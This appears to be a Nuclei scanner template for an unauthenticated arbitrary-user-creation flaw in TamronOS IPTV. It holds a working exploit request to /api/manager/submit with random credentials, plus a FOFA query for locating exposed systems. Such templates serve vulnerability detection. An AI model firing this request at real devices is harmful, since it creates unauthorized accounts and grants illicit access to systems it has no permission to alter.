tamronos-user-creation: TamronOS IPTV - Arbitrary User Creation

id: tamronos-user-creation

info:
  name: TamronOS IPTV - Arbitrary User Creation
  author: pussycat0x
  severity: high
  description: Unathenticated attackers can create multiple users in TamronOS IPTV.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TamronOS%20IPTV%E7%B3%BB%E7%BB%9F%20submit%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E5%88%9B%E5%BB%BA%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="TamronOS-IPTV系统"
  tags: tamronos,miconfig,iptv,vuln
variables:
  username: "{{to_lower(rand_text_alphanumeric(6))}}"
  password: "{{rand_text_alphanumeric(12)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/manager/submit?group=1&username={{username}}&password={{password}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"suc":true'
          - '"msg":"\u6210\u529f"'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d121ee7aed71189bbc22c8843399bd9ef4bb70ad0d31b68a54c293766b53e5890220574414ac1084c84a180425d66a4c0bd2c1243440ab973a10c7e57fd5739b5e6b:922c64590222798bb761d5b6d8e72950